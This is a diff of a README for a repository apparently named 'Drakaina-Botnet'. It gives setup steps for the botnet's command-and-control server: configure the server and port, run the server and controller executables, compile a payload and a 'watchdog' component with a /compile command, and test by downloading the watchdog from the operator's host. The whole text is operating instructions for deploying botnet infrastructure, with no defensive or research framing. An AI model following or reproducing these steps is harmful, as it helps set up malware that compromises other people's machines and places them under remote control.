h0lyl337/Drakaina-Botnet/README.md

 1) open server.cfg and change the server and port to what you want the server to run on.

-2) run server.py using " python server.py " or " python3 server.py " from the commandline.
+2) run server.exe

+3) run commandcontrol.exe

+4) type the /compile command to start compiling your payload, and watchdog

-3) test by downloading the Watchdog file from the link "http://<yourip>:<port>/downloads/windows/watchdog"
+5) test by downloading the Watchdog file from the link "http://(yourip):(port)/downloads/windows/watchdog"

 4) you should see requests comming in to your server...enjoy